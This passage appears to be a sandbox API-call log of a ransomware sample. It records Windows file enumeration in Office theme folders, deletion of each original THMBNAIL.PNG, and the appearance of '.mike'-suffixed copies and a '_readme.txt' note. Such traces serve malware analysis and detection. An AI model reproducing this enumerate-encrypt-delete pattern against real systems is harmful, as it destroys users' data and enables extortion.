ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe973ac00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe973ac00, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0053.959] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0053.959] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0053.959] CoTaskMemFree (pv=0x4e1c10) [0053.960] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.960] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe32f2700, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51a15810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe32f2700, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x10db7, dwReserved0=0x0, dwReserved1=0x0, cFileName="BLENDS.ELM", cAlternateFileName="")) returned 1 [0053.960] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb59ad00, ftCreationTime.dwHighDateTime=0x1c4d794, ftLastAccessTime.dwLowDateTime=0x5f729350, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcb59ad00, ftLastWriteTime.dwHighDateTime=0x1c4d794, nFileSizeHigh=0x0, nFileSizeLow=0x216, dwReserved0=0x0, dwReserved1=0x0, cFileName="BLENDS.INF", cAlternateFileName="")) returned 1 [0053.960] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6d2cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x885, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0053.960] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x5093, dwReserved0=0x0, dwReserved1=0x0, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0053.960] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0053.961] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0053.966] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0053.967] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png")) returned 1 [0053.969] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe9760d60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe9760d60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.969] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe32f2700, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51a15810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe32f2700, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x10db7, dwReserved0=0x0, dwReserved1=0x0, cFileName="BLENDS.ELM", cAlternateFileName="")) returned 1 [0053.969] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb59ad00, ftCreationTime.dwHighDateTime=0x1c4d794, ftLastAccessTime.dwLowDateTime=0x5f729350, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcb59ad00, ftLastWriteTime.dwHighDateTime=0x1c4d794, nFileSizeHigh=0x0, nFileSizeLow=0x216, dwReserved0=0x0, dwReserved1=0x0, cFileName="BLENDS.INF", cAlternateFileName="")) returned 1 [0053.969] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6d2cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x885, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0053.969] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe973ac00, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe973ac00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe9760d60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x52c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="THMBNAIL.PNG.mike", cAlternateFileName="THMBNA~1.MIK")) returned 1 [0053.969] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9760d60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe9760d60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe9760d60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0053.969] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9760d60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe9760d60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe9760d60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0053.969] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0053.969] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0053.969] CoTaskMemFree (pv=0x4e1c10) [0053.969] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.969] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c2ae00, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x5f775610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe6c2ae00, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xc2ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="BLUECALM.ELM", cAlternateFileName="")) returned 1 [0053.969] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x51a15810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x227, dwReserved0=0x0, dwReserved1=0x0, cFileName="BLUECALM.INF", cAlternateFileName="")) returned 1 [0053.969] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6d2cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x618, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0053.970] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x80f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0053.970] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0053.970] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0053.975] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0053.976] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png")) returned 1 [0053.978] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe9760d60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe9760d60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.978] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c2ae00, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x5f775610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe6c2ae00, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xc2ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="BLUECALM.ELM", cAlternateFileName="")) returned 1 [0053.978] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x51a15810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x227, dwReserved0=0x0, dwReserved1=0x0, cFileName="BLUECALM.INF", cAlternateFileName="")) returned 1 [0053.978] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6d2cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x618, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0053.978] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9760d60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe9760d60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe9760d60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x8320, dwReserved0=0x0, dwReserved1=0x0, cFileName="THMBNAIL.PNG.mike", cAlternateFileName="THMBNA~1.MIK")) returned 1 [0053.978] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9760d60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe9760d60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe9760d60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0053.978] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9760d60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe9760d60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe9760d60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0053.978] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0053.978] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0053.978] CoTaskMemFree (pv=0x4e1c10) [0053.979] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.979] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7f3db00, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51a15810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe7f3db00, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xda86, dwReserved0=0x0, dwReserved1=0x0, cFileName="BLUEPRNT.ELM", cAlternateFileName="")) returned 1 [0053.979] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5fbc5df0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x225, dwReserved0=0x0, dwReserved1=0x0, cFileName="BLUEPRNT.INF", cAlternateFileName="")) returned 1 [0053.979] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x785, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0053.979] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x6b0f, dwReserved0=0x0, dwReserved1=0x0, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0053.979] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0053.981] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0053.989] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 1 [0053.989] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png")) returned 1 [0053.991] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe9786ec0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe9786ec0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.991] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7f3db00, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51a15810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe7f3db00, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xda86, dwReserved0=0x0, dwReserved1=0x0, cFileName="BLUEPRNT.ELM", cAlternateFileName="")) returned 1 [0053.991] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5fbc5df0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x225, dwReserved0=0x0, dwReserved1=0x0, cFileName="BLUEPRNT.INF", cAlternateFileName="")) returned 1 [0053.991] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x785, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0053.992] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9786ec0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe9786ec0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe9786ec0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x6d30, dwReserved0=0x0, dwReserved1=0x0, cFileName="THMBNAIL.PNG.mike", cAlternateFileName="THMBNA~1.MIK")) returned 1 [0053.992] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9786ec0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe9786ec0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe9786ec0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0053.992] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9786ec0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe9786ec0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe9786ec0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0053.992] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0053.992] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0053.992] CoTaskMemFree (pv=0x4e1c10) [0053.993] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.993] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9250800, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51a15810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe9250800, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xeafa, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOLDSTRI.ELM", cAlternateFileName="")) returned 1 [0053.993] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x51a15810, 